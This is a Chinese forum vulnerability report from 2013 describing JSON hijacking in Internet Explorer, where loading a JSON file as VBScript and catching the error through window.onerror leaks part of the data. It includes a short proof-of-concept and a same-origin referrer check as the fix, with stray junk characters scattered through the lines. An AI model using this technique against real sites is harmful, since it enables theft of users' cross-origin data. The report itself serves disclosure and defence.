简要描述:/ M [- e( b2 I- k; t( E0 Y
: `7 D. p; l) I. O由于某些资源容器对数据处理不当导致json劫持漏洞.. B' m+ O, j* w( x" a$ x% G
详细说明:3 W3 H5 Y: w+ W
由于ie支持vbscript,所以script元素可以指定成vbscript语言:
0 e/ i5 {# T L( N1 s1 s ?<script language=vbscript></script>, X0 k u0 l. V. @# t: \
2 x3 X, w9 S( J当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.; D- h) T9 v1 `+ F
漏洞证明:, E! m9 ^) J& g! A+ x
<script># m+ i* y& d0 a/ A* F
window.onerror=function(_){4 ?# a& I; d8 F9 l9 b8 _
alert(_)
8 Y, [+ q6 o" E7 \" z+ }}
7 ?5 u) E, g, c0 }</script>$ A9 U3 q: G1 a+ n
<script language=vbscript src=1.json></script>, y' U9 J$ ?3 B7 B3 G3 l% i. _$ _
( u( X2 C5 c3 D* n7 Z! O- T, `
, g2 d- r) @6 O
1.json:
/ r; ]7 l2 c' E8 |[{"name":"sogili","age":19}]) P7 |) ], q3 L7 O
修复方案:
+ K6 P6 f$ I: S# | z) j8 W4 `网站业务对于这个问题可以通过验证referrer是否为同源来防御 |
发表于 2013-2-23 11:33:57
收藏
支持
反对